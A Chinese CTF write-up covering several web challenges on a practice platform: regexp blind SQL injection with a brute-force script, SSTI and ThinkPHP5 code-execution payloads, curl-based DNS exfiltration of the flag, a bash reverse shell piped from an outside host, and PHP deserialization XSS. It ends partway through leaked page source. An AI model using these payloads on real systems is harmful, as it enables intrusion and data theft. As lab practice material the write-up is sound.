这道题没写出来,又很好奇怎么解的,所以先写一下,最初想了好久才想到可以用\转义掉'
,然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路
username=\
password= or !(1<>1)#
得到
发现不一样了,那么就可以开始构造语句了,or !(!(length(database())<>7)<>1)#
然后用substr截取得到了数据库名为p3rh4ps,然后就select不出来了,这里改为用regexp,由于直接regexp匹配在3.23.4版本后是不分大小写的,要加上binary关键字,试试爆出password
username=%5C&password=or password regexp binary 0x5e4f#
其中0x5e4f为^O的16进制编码
说明第一个字为O,依次爆出即可
师傅脚本如下:
import os
import requests as req
def ord2hex(string):
result = ''
for i in string:
result += hex(ord(i))
result = result.replace('0x','')
return '0x'+result
url = "http://59edc701-b28a-4a3c-a3cf-06d107c8f72c.node3.buuoj.cn/index.php"
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789']
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive'
}
res = ''
for i in range(50):
for j in string:
passwd = ord2hex('^'+res+chr(j))
#print(passwd)
passwd = 'or password regexp binary {}#'.format(passwd)
data = {
'username':"admin\\",
'password':passwd
}
r = req.post(url, data=data, headers=headers)
# print(r.text)
if "BJD need" in r.text:
res += chr(j)
print(res)
break
得到密码,admin进入即可得到flag
真的没想到直接爆password,然后16进制代替’^'也很巧妙
这题ssti注入,网上也有payload,我找的是这个:SSTI (服务器模板注入)
首先进入发现是一个搜索框,试试{{7*7}}
变为了49,那么就可以套用payload了,直接命令执行
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
或者直接用师傅的payload{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
这题很明显是thinkphp5的漏洞,在网上找到相应的payload即可,我找的是这个:ThinkPHP5.0.*版本代码执行漏洞
POST提交_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
试试cat /flag就得到了flag:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag
试了好多payload才成功的,有些payload会报错
我做出来的最后一题,后面的就不会了,首先提示.swp,那么首先下载
在linux下使用vim修复即可得到源码vim -r index.php.swp
使用post传girl_friend,并且还要绕过正则匹配,主要的是使用exec(),这个函数使无回显的,由于我之前见过无回显情况,使用的是curl
使用内网的DNS服务
首先POST传girl_friend=curl 111111.5982bd2d233be1da76ca.d.dns.requestbin.buuoj.cn
得到了回显
那么可以使用``执行命令了
girl_friend=curl `tac /flag`.5982bd2d233be1da76ca.d.dns.requestbin.buuoj.cn
怎么和我做的时候不一样,还要找flag。。。
最后在/etc/demo/P3rh4ps/love/you/flag找到了flag,这里我还是用师傅的方法,反弹shell
首先创建一个小号,然后使用xshell连接linux靶机并登录即可使用,首先查看ip
ifconfig -a
然后在www/html写一个文件a.txt:
bash -i >& /dev/tcp/174.1.90.231/2333 0>&1
nc监听端口2333nc -lvp 2333
最后curl即可girl_friend=curl 174.1.90.231/a.txt|bash
接下来寻找flag find / -name flag
最后cat即可cat /etc/demo/P3rh4ps/love/you/flag
这道题没什么思路,看wp发现先抓包,得到L0g1n.php
访问
然后等99年,抓包看看,修改cookie的time
然后是本地访问,XFF不能用,但还可以用Client-IP或者X-Real-IP代替XFF
Client-IP:127.0.0.1
要从gem-love.com访问,增加Referer
Referer:gem-love.com
然后要使用Commodo 64访问,但是 UA 改成 Commodo 64 后被告诉这不是真的 commodo64,随便查一下就能发现有一种系统叫 Commodore,所以要改成 Commodore 64(也可以直接查它的 UA 的标准形式)抄一下
"Contiki/1.0 (Commodore 64; http://dunkels.com/adam/contiki/)"
然后是email is [email protected]
From:[email protected]
最后是use the http proxy of y1ng.vip
Via:y1ng.vip
得到base64编码的flag,解码即可
难度迷惑可还行
首先查看源码得到test.php,由于是白色所以看不见
发现是个登录页面,做题时没看到这个,看wp后缩小了才看到的。。。。。
然后用之前给的界面进行爆破,抓包可以看到cookie有个base64编码的字符串
解码得1585039815,是提交时的时间戳
直接将cookie置空试试
真就变为了%99,迷惑
check就可以得到av号了
最后去b站看看是什么视频av11664517
,北京大学量子力学。。。。。。
拿到题开头gungungun就不会了,没想到是git泄露
拿到源码:
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
这是利用php的原生类进行xss payload,用的是Exception反序列化
由于师傅说只要xss执行window.open()就能把flag带出来,直接利用了师傅的代码
$y1ng = new Exception('"');
echo urlencode(serialize($y1ng));
运行得到一串url编码的字符串,传入即可在cookie得到flag
id=506F2E,16进制解码为Po.
id=706870,16进制解码为php
访问得到一个点,那么猜测元素周期表的所有元素都存在
师傅脚本如下:
import os
import requests as req
elements = ('H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue')
for symbol in elements:
link = "http://2c09f75d-30ec-4811-9ae7-5645bc809efa.node3.buuoj.cn/" + symbol + ".php"
response = req.get(link)
if response.status_code == 200:
print(response.text, end='')
else:
continue
得到And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php,访问即可得到flag
看wp才发现是查看消息头得到hint
访问得到,是一个文件包含
试着访问robots.txt,存在admin.php和flag.php
但在home.php引用别的文件就会被拼接上.fxxkyou,导致失败,所以先使用伪协议读取system的代码
?file=php://filter/convert.base64-encode/resource=system
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){
echo "";
header("Refresh:0.1;url=index.php");
die;
}
$str2 = ' Error: url invalid
~$ ';
$str3 = ' Error: damn hacker!
~$ ';
$str4 = ' Error: request method error
~$ ';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>File Detector</title>
<link rel="stylesheet" type="text/css" href="css/normalize.css" />
<link rel="stylesheet" type="text/css" href="css/demo.css" />
<link rel="stylesheet" type="text/css" href="css/component.css" />
<script src="js/modernizr.custom.js"></script>
</head>
<body>
<section>
<form id="theForm" class="simform" autocomplete="off" action="system.php" method="post">
<div class="simform-inner">
<span><p><center>File Detector</center></p></span>
<ol class="questions">
<li>
<span><label for="q1">你知道目录下都有什么文件吗?</label></span>
<input id="q1" name="q1" type="text"/>
</li>
<li>
<span><label for="q2">请输入你想检测文件内容长度的url</label></span>
<input id="q2" name="q2" type="text"/>
</li>
<li>
<span><label for="q1">你希望以何种方式访问?GET?POST?</label></span>
<input id="q3" name="q3" type="text"/>
</li>
</ol>
<button class="submit" type="submit" value="submit">提交</button>
<div class="controls">
<button class="next"></button>
<div class="progress"></div>
<span class="number">
<span class="number-current"></span>
<span class="number-total"></span>
</span>
<span class="error-message"></span>
</div>
</div>
<span class="final-message"></span>
</form>
<span><p><center><a href="https://gem-love.com" target="_blank">@颖奇L'Amore